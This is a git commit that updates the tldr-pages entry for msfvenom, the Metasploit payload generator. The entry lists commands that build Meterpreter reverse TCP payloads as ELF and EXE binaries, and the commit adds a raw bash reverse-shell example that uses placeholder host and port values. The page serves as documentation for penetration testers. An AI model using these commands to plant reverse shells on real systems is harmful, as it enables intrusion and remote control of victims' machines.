msfvenom: add raw example (#8095)

* Use built in output option in msfvenom

* Add msfvenom example to generate bash reverse tcp handler

* Add newline to the end of msfvenom file

* Update pages/common/msfvenom.md

Co-authored-by: Axel Navarro <navarroaxel@gmail.com>

Co-authored-by: Axel Navarro <navarroaxel@gmail.com>
htop
Fazle Arefin 2022-05-30 15:58:30 +10:00 committed by GitHub
parent 4747947744
commit cf7215e832
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 2 deletions

View File

@ -17,8 +17,12 @@
- Create an ELF binary with a reverse TCP handler:
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > {{path/to/binary}}`
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf -o {{path/to/binary}}`
- Create an EXE binary with a reverse TCP handler:
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > {{path/to/binary.exe}}`
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe -o {{path/to/binary.exe}}`
- Create a raw bash with a reverse TCP handler:
`msfvenom -p cmd/unix/reverse_bash LHOST={{local_ip}} LPORT={{local_port}} -f raw`